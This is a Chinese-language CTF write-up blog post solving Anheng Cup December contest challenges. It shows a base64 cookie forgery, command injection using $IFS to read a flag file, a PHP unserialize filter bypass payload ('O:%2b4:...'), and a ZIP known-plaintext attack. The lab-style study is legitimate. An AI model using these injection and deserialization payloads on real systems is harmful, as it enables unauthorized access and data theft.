<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  

  
  <title>安恒杯12月月赛WP | 可乐&#39;blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="WEB这次的月赛可以说非常适合我这种菜鸡做了 ezweb2:请求包中发现一个user=base64 解码得到user,构造admin 然后base64提交 发现跳转到后台admin.php 试了一个ls发现有回显,应该是个命令执行漏洞 构造: cmd = ls$IFS/  成功回显 然后读取flag:  cmd = cat $IFS /ffLAG_404 easy：1234567891011121">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="安恒杯12月月赛WP">
<meta property="og:url" content="https://style-404.github.io/2018/12/23/安恒杯12月月赛WP/index.html">
<meta property="og:site_name" content="可乐&#39;blog">
<meta property="og:description" content="WEB这次的月赛可以说非常适合我这种菜鸡做了 ezweb2:请求包中发现一个user=base64 解码得到user,构造admin 然后base64提交 发现跳转到后台admin.php 试了一个ls发现有回显,应该是个命令执行漏洞 构造: cmd = ls$IFS/  成功回显 然后读取flag:  cmd = cat $IFS /ffLAG_404 easy：1234567891011121">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2018-12-23T15:00:42.627Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="安恒杯12月月赛WP">
<meta name="twitter:description" content="WEB这次的月赛可以说非常适合我这种菜鸡做了 ezweb2:请求包中发现一个user=base64 解码得到user,构造admin 然后base64提交 发现跳转到后台admin.php 试了一个ls发现有回显,应该是个命令执行漏洞 构造: cmd = ls$IFS/  成功回显 然后读取flag:  cmd = cat $IFS /ffLAG_404 easy：1234567891011121">
  
    <link rel="alternate" href="/atom.xml" title="可乐&#39;blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">可乐&#39;blog</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://style-404.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-安恒杯12月月赛WP" class="article article-type-post" itemscope="" itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/12/23/安恒杯12月月赛WP/" class="article-date">
  <time datetime="2018-12-23T14:59:22.000Z" itemprop="datePublished">2018-12-23</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      安恒杯12月月赛WP
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><pre><code>这次的月赛可以说非常适合我这种菜鸡做了
</code></pre><h2 id="ezweb2"><a href="#ezweb2" class="headerlink" title="ezweb2:"></a>ezweb2:</h2><p>请求包中发现一个user=base64</p>
<p>解码得到user,构造admin 然后base64提交</p>
<p>发现跳转到后台admin.php</p>
<p>试了一个ls发现有回显,应该是个命令执行漏洞</p>
<p>构造: cmd = ls$IFS/  成功回显</p>
<p>然后读取flag:  cmd = cat $IFS /ffLAG_404</p>
<h2 id="easy："><a href="#easy：" class="headerlink" title="easy："></a>easy：</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span>  </span></span><br><span class="line"><span class="php">@error_reporting(<span class="number">1</span>); </span></span><br><span class="line"><span class="php"><span class="keyword">include</span> <span class="string">'flag.php'</span>;</span></span><br><span class="line"><span class="php"><span class="class"><span class="keyword">class</span> <span class="title">baby</span> </span></span></span><br><span class="line"><span class="php">&#123;   </span></span><br><span class="line"><span class="php">    <span class="keyword">public</span> $file;</span></span><br><span class="line"><span class="php">    <span class="function"><span class="keyword">function</span> <span class="title">__toString</span><span class="params">()</span>      </span></span></span><br><span class="line"><span class="php">    &#123;          </span></span><br><span class="line"><span class="php">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;file)) </span></span><br><span class="line"><span class="php">        &#123;</span></span><br><span class="line"><span class="php">            $filename = <span class="string">"./&#123;$this-&gt;file&#125;"</span>;        </span></span><br><span class="line"><span class="php">            <span class="keyword">if</span> (file_get_contents($filename))         </span></span><br><span class="line"><span class="php">            &#123;              </span></span><br><span class="line"><span class="php">                <span class="keyword">return</span> file_get_contents($filename); </span></span><br><span class="line"><span class="php">            &#125; </span></span><br><span class="line"><span class="php">        &#125;     </span></span><br><span class="line"><span class="php">    &#125;  </span></span><br><span class="line"><span class="php">&#125;  </span></span><br><span class="line"><span class="php"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'data'</span>]))  </span></span><br><span class="line"><span class="php">&#123; </span></span><br><span class="line"><span class="php">    $data = $_GET[<span class="string">'data'</span>];</span></span><br><span class="line"><span class="php">    preg_match(<span class="string">'/[oc]:\d+:/i'</span>,$data,$matches);</span></span><br><span class="line"><span class="php">    <span class="keyword">if</span>(count($matches))</span></span><br><span class="line"><span class="php">    &#123;</span></span><br><span class="line"><span class="php">        <span class="keyword">die</span>(<span class="string">'Hacker!'</span>);</span></span><br><span class="line"><span class="php">    &#125;</span></span><br><span class="line"><span class="php">    <span class="keyword">else</span></span></span><br><span class="line"><span class="php">    &#123;</span></span><br><span class="line"><span class="php">        $good = unserialize($data);</span></span><br><span class="line"><span class="php">        <span class="keyword">echo</span> $good;</span></span><br><span class="line"><span class="php">    &#125;     </span></span><br><span class="line"><span class="php">&#125; </span></span><br><span class="line"><span class="php"><span class="keyword">else</span> </span></span><br><span class="line"><span class="php">&#123; </span></span><br><span class="line"><span class="php">    highlight_file(<span class="string">"./index.php"</span>); </span></span><br><span class="line"><span class="php">&#125; </span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>
<p>本地构造序列化<br>O:4:”baby”:1:{s:4:”file”;s:8:”flag.php”;}</p>
<p>因为存在过滤出语句<br>preg_match(‘/[oc]:\d+:/i’,$data,$matches);</p>
<p>所以需要绕过,用加号进行绕过:<br>O:+4:”baby”:1:{s:4:”file”;s:8:”flag.php”;}</p>
<p>但如果直接传值的话会，服务器接收到会把加号认为空格，所以要对加号url编码：<br>O:%2b4:”baby”:1:{s:4:”file”;s:8:”flag.php”;}</p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h2 id="JUJU"><a href="#JUJU" class="headerlink" title="JUJU"></a>JUJU</h2><p> 提示女朋友问我这11只JUJU哪只好看？<br> 图片里没有11只JUJU，用windex改个高度即可<br>然后base32解码得到flag</p>
<h2 id="学习资料"><a href="#学习资料" class="headerlink" title="学习资料"></a>学习资料</h2><p>zip加密，一般zip加密只有那几种，并且打开zip文件里面还有一个已经给出的txt文件，还有一个经过加密的zip文件，很明显是明文攻击就可以了<br>将txt文件加密为zip文件,然后用ARCHPR进行明文攻击<br>得到一个doc文件打开,得到一个5 3 的图片，把图片移开就可以看到flag了</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://style-404.github.io/2018/12/23/安恒杯12月月赛WP/" data-id="cjvrp4gkp001o5gqru1ys65qh" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/">CTF</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2018/12/23/初写留言板/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          初写留言板
        
      </div>
    </a>
  
  
    <a href="/2018/12/21/CTF实验吧writeup/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">CTF实验吧writeup</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/python/">python</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web安全/">web安全</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/日记/">日记</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/">CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Linux/">Linux</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SSH/">SSH</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/c/">c++</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web安全/">web安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/writeup/">writeup</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/代码审计/">代码审计</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/开发/">开发</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/日记/">日记</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/汇编/">汇编</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/爬虫/">爬虫</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CTF/" style="font-size: 20px;">CTF</a> <a href="/tags/Linux/" style="font-size: 10px;">Linux</a> <a href="/tags/SSH/" style="font-size: 10px;">SSH</a> <a href="/tags/c/" style="font-size: 10px;">c++</a> <a href="/tags/web安全/" style="font-size: 15px;">web安全</a> <a href="/tags/writeup/" style="font-size: 10px;">writeup</a> <a href="/tags/代码审计/" style="font-size: 12.5px;">代码审计</a> <a href="/tags/开发/" style="font-size: 17.5px;">开发</a> <a href="/tags/日记/" style="font-size: 10px;">日记</a> <a href="/tags/汇编/" style="font-size: 10px;">汇编</a> <a href="/tags/爬虫/" style="font-size: 10px;">爬虫</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/05/">May 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/04/">April 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/03/">March 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/02/">February 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/01/">January 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/12/">December 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/11/">November 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2019/05/17/网易云音乐免费下载/">网易云音乐免费下载</a>
          </li>
        
          <li>
            <a href="/2019/05/11/linux学习笔记/">linux学习笔记</a>
          </li>
        
          <li>
            <a href="/2019/05/11/docker学习/">docker学习</a>
          </li>
        
          <li>
            <a href="/2019/05/08/test/">test</a>
          </li>
        
          <li>
            <a href="/2019/04/19/PHP-sprintf格式化字符串漏洞/">PHP sprintf格式化字符串漏洞</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 筱阳<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>